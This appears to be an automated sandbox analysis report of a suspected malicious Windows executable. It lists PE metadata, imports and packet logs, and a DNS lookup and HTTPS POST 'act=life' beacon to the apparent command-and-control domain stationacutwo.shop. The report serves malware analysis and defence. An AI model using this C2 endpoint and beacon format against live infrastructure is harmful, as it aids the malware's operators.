mov dword ptr [0043A81Ch], eax
mov dword ptr [0043A810h], C0000409h
mov dword ptr [0043A814h], 00000001h
mov eax, dword ptr [00439004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [00439008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000A8h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3777c	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2326000	0x101d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x36000	0x188	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x34355	0x34400	1e22a9eb96e8bc6bddbd0ff7b987131a	False	0.9151325134569378	data	7.864433923714666	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x36000	0x205c	0x2200	a5b8325eecea3a51a4e0810dc2e11832	False	0.3469669117647059	data	5.4033804076627225	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x39000	0x22ec548	0x1e00	a65fda2a0cbdeb547a2c0ded9ba8b6c3	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2326000	0x101d8	0x10200	e84891895355dc5bef77d4d53a98f7c5	False	0.45842417635658916	data	4.996179893505764	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
NUSUTUMA	0x232cf08	0x3fa	ASCII text, with very long lines (1018), with no line terminators	Turkish	Turkey	0.6277013752455796
RT_CURSOR	0x232d308	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x232d438	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_ICON	0x23266d0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.6114072494669509
RT_ICON	0x2327578	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.6931407942238267
RT_ICON	0x2327e20	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.7528801843317973
RT_ICON	0x23284e8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.7933526011560693
RT_ICON	0x2328a50	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkish	Turkey	0.5953319502074689
RT_ICON	0x232aff8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkish	Turkey	0.725375234521576
RT_ICON	0x232c0a0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkish	Turkey	0.7377049180327869
RT_ICON	0x232ca28	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkish	Turkey	0.8847517730496454
RT_STRING	0x232fbb8	0xaa	data			0.611764705882353
RT_STRING	0x232fc68	0x6e	data			0.6
RT_STRING	0x232fcd8	0x6b2	data			0.4305717619603267
RT_STRING	0x2330390	0x688	data			0.4342105263157895
RT_STRING	0x2330a18	0x6a4	data			0.42764705882352944
RT_STRING	0x23310c0	0x202	data			0.5019455252918288
RT_STRING	0x23312c8	0x6a4	data			0.42705882352941177
RT_STRING	0x2331970	0x6d8	data			0.4297945205479452
RT_STRING	0x2332048	0x7e0	data			0.42162698412698413
RT_STRING	0x2332828	0x71a	data			0.42684268426842686
RT_STRING	0x2332f48	0x698	data			0.4277251184834123
RT_STRING	0x23335e0	0x798	data			0.4202674897119342
RT_STRING	0x2333d78	0x6dc	data			0.4299544419134396
RT_STRING	0x2334458	0x82c	data			0.41634799235181646
RT_STRING	0x2334c88	0x672	data			0.44
RT_STRING	0x2335300	0x752	data			0.4247598719316969
RT_STRING	0x2335a58	0x724	data			0.424507658643326
RT_STRING	0x2336180	0x52	data			0.6585365853658537
RT_GROUP_CURSOR	0x232f9e0	0x22	data			1.088235294117647
RT_GROUP_ICON	0x232ce90	0x76	data	Turkish	Turkey	0.6610169491525424
RT_VERSION	0x232fa08	0x1b0	data			0.5972222222222222

Imports

DLL	Import
KERNEL32.dll	SetVolumeMountPointW, GetComputerNameW, SleepEx, GetCommProperties, GetModuleHandleW, GetTickCount, ReadConsoleOutputA, GlobalAlloc, lstrcpynW, WriteConsoleW, GetModuleFileNameW, GetConsoleAliasesW, CreateJobObjectW, GetProcAddress, BuildCommDCBW, GetAtomNameA, LoadLibraryA, UnhandledExceptionFilter, InterlockedExchangeAdd, AddAtomA, FoldStringA, lstrcatW, EnumDateFormatsW, FindFirstVolumeA, AreFileApisANSI, OpenJobObjectA, ZombifyActCtx, GetLastError, GetConsoleAliasExesLengthA, CreateFileA, GetConsoleOutputCP, MultiByteToWideChar, HeapReAlloc, HeapAlloc, GetStartupInfoW, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, Sleep, HeapSize, ExitProcess, HeapCreate, VirtualFree, HeapFree, VirtualAlloc, WriteFile, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringA, WideCharToMultiByte, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, ReadFile, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA
GDI32.dll	GetBoundsRect
ADVAPI32.dll	EnumDependentServicesA
ole32.dll	CoTaskMemRealloc
WINHTTP.dll	WinHttpAddRequestHeaders

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 19:02:00.278760910 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:00.278794050 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:00.278904915 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:00.284331083 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:00.284347057 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:00.757734060 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:00.757812023 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:00.766042948 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:00.766061068 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:00.766338110 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:00.824450970 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:00.824465036 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:00.824563026 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:01.199270010 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:01.199348927 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:01.199433088 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:01.201777935 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:01.201795101 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:01.205091000 CEST	49731	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:01.205132008 CEST	443	49731	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:01.205199957 CEST	49731	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:01.205452919 CEST	49731	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:01.205467939 CEST	443	49731	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:01.693440914 CEST	443	49731	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:01.693511963 CEST	49731	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:01.699748993 CEST	49731	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:01.699759960 CEST	443	49731	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:01.699985027 CEST	443	49731	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:01.701446056 CEST	49731	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:01.701494932 CEST	49731	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:01.701513052 CEST	443	49731	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:02.400413990 CEST	443	49731	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:02.400456905 CEST	443	49731	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:02.400487900 CEST	443	49731	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:02.400511026 CEST	443	49731	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:02.400541067 CEST	443	49731	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:02.400573969 CEST	443	49731	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:02.400868893 CEST	443	49731	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:02.404463053 CEST	49731	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:02.404505014 CEST	443	49731	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:02.404702902 CEST	49731	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:02.405098915 CEST	443	49731	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:02.405153036 CEST	443	49731	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:02.405190945 CEST	49731	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:02.405201912 CEST	443	49731	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:02.466772079 CEST	49731	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:02.492897034 CEST	443	49731	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:02.492944956 CEST	443	49731	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:02.492971897 CEST	443	49731	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:02.492989063 CEST	49731	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:02.493020058 CEST	443	49731	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:02.493061066 CEST	49731	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:02.493074894 CEST	443	49731	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:02.493088007 CEST	443	49731	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:02.493125916 CEST	49731	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:02.553960085 CEST	49731	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:02.553988934 CEST	443	49731	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:02.554009914 CEST	49731	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:02.554017067 CEST	443	49731	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:02.904079914 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:02.904109001 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:02.904200077 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:02.905134916 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:02.905144930 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:03.400080919 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:03.402682066 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:03.415999889 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:03.416016102 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:03.416234970 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:03.428131104 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:03.428230047 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:03.428266048 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:03.428313017 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:03.428330898 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:03.934511900 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:03.934602976 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:03.934740067 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:03.934762001 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:03.934779882 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:04.033797026 CEST	49733	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:04.033824921 CEST	443	49733	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:04.033888102 CEST	49733	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:04.034187078 CEST	49733	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:04.034200907 CEST	443	49733	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:04.529588938 CEST	443	49733	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:04.529668093 CEST	49733	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:04.531091928 CEST	49733	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:04.531111956 CEST	443	49733	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:04.531421900 CEST	443	49733	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:04.532496929 CEST	49733	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:04.532624006 CEST	49733	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:04.532682896 CEST	443	49733	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:04.929897070 CEST	443	49733	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:04.929987907 CEST	443	49733	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:04.930032015 CEST	49733	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:04.930427074 CEST	49733	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:04.930447102 CEST	443	49733	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:05.211939096 CEST	49734	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:05.211977959 CEST	443	49734	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:05.212039948 CEST	49734	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:05.212438107 CEST	49734	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:05.212454081 CEST	443	49734	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:05.704312086 CEST	443	49734	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:05.704499006 CEST	49734	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:05.705670118 CEST	49734	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:05.705682039 CEST	443	49734	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:05.705918074 CEST	443	49734	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:05.707103014 CEST	49734	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:05.707223892 CEST	49734	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:05.707257032 CEST	443	49734	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:05.707340002 CEST	49734	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:05.707350969 CEST	443	49734	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:06.261940002 CEST	443	49734	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:06.262032032 CEST	443	49734	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:06.262259960 CEST	49734	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:06.262307882 CEST	49734	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:06.262335062 CEST	443	49734	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:06.722322941 CEST	49735	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:06.722357035 CEST	443	49735	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:06.722434044 CEST	49735	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:06.722750902 CEST	49735	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:06.722764015 CEST	443	49735	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:07.214402914 CEST	443	49735	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:07.214481115 CEST	49735	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:07.215840101 CEST	49735	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:07.215852022 CEST	443	49735	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:07.216088057 CEST	443	49735	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:07.217513084 CEST	49735	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:07.217631102 CEST	49735	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:07.217655897 CEST	443	49735	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:07.648566008 CEST	443	49735	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:07.648654938 CEST	443	49735	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:07.648719072 CEST	49735	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:07.648876905 CEST	49735	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:07.648897886 CEST	443	49735	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:07.756949902 CEST	49736	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:07.756980896 CEST	443	49736	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:07.757057905 CEST	49736	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:07.757337093 CEST	49736	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:07.757349968 CEST	443	49736	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:08.262855053 CEST	443	49736	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:08.263052940 CEST	49736	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:08.264448881 CEST	49736	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:08.264457941 CEST	443	49736	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:08.264689922 CEST	443	49736	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:08.265907049 CEST	49736	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:08.265985966 CEST	49736	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:08.265991926 CEST	443	49736	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:08.689804077 CEST	443	49736	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:08.689932108 CEST	443	49736	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:08.689976931 CEST	49736	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:08.690040112 CEST	49736	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:08.690059900 CEST	443	49736	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:09.171684027 CEST	49737	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:09.171752930 CEST	443	49737	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:09.171822071 CEST	49737	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:09.172144890 CEST	49737	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:09.172173977 CEST	443	49737	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:09.643846989 CEST	443	49737	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:09.643917084 CEST	49737	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:09.645780087 CEST	49737	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:09.645796061 CEST	443	49737	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:09.646034956 CEST	443	49737	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:09.649456024 CEST	49737	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:09.650377035 CEST	49737	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:09.650414944 CEST	443	49737	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:09.650511980 CEST	49737	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:09.650543928 CEST	443	49737	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:09.650650978 CEST	49737	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:09.650708914 CEST	443	49737	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:09.650834084 CEST	49737	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:09.650861979 CEST	443	49737	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:09.650990963 CEST	49737	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:09.651025057 CEST	443	49737	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:09.651175022 CEST	49737	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:09.651206017 CEST	443	49737	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:09.651220083 CEST	49737	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:09.651297092 CEST	49737	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:09.651324987 CEST	49737	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:09.661322117 CEST	443	49737	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:09.661446095 CEST	49737	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:09.661484957 CEST	443	49737	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:09.661510944 CEST	49737	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:09.661529064 CEST	49737	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:09.661607027 CEST	49737	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:09.661645889 CEST	49737	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:09.666697979 CEST	443	49737	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:09.666871071 CEST	49737	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:09.666908026 CEST	443	49737	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:09.666915894 CEST	49737	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:09.668351889 CEST	443	49737	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:11.129879951 CEST	443	49737	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:11.129976988 CEST	443	49737	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:11.130024910 CEST	49737	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:11.130115032 CEST	49737	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:11.130132914 CEST	443	49737	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:11.138700008 CEST	49738	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:11.138727903 CEST	443	49738	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:11.138801098 CEST	49738	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:11.139198065 CEST	49738	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:11.139211893 CEST	443	49738	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:11.626775980 CEST	443	49738	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:11.626835108 CEST	49738	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:11.627933979 CEST	49738	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:11.627943039 CEST	443	49738	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:11.628145933 CEST	443	49738	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:11.629462004 CEST	49738	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:11.629534006 CEST	49738	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:11.629556894 CEST	443	49738	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:12.232594967 CEST	443	49738	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:12.232680082 CEST	443	49738	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:12.232870102 CEST	49738	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:12.233042955 CEST	49738	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:12.233042955 CEST	49738	443	192.168.2.4	188.114.97.3
Jul 2, 2024 19:02:12.233062029 CEST	443	49738	188.114.97.3	192.168.2.4
Jul 2, 2024 19:02:12.233069897 CEST	443	49738	188.114.97.3	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 19:02:00.257067919 CEST	54533	53	192.168.2.4	1.1.1.1
Jul 2, 2024 19:02:00.274194956 CEST	53	54533	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 2, 2024 19:02:00.257067919 CEST	192.168.2.4	1.1.1.1	0x98f6	Standard query (0)	stationacutwo.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 2, 2024 19:02:00.274194956 CEST	1.1.1.1	192.168.2.4	0x98f6	No error (0)	stationacutwo.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 2, 2024 19:02:00.274194956 CEST	1.1.1.1	192.168.2.4	0x98f6	No error (0)	stationacutwo.shop		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

stationacutwo.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	188.114.97.3	443	3696	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-02 17:02:00 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: stationacutwo.shop
2024-07-02 17:02:00 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-07-02 17:02:01 UTC	796	IN	HTTP/1.1 200 OK Date: Tue, 02 Jul 2024 17:02:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gv4mc4bn0e1ts02q4rfhjmrjrq; expires=Sat, 26-Oct-2024 10:48:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cWZwuU7HQ2Bj3wV83wUdggUHMwLaO3iFbRkvZnR0OJfkTFNgTr6sSiwkruF0YYQgfupbDCjPRaf7NGqhj7Y3dRexVvKWFAcTjZVF2eIDeT5CfNQphbYeLO0LgmhHhRyOYwBDFhg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89d033777ecdc334-EWR alt-svc: h3=":443"; ma=86400
2024-07-02 17:02:01 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
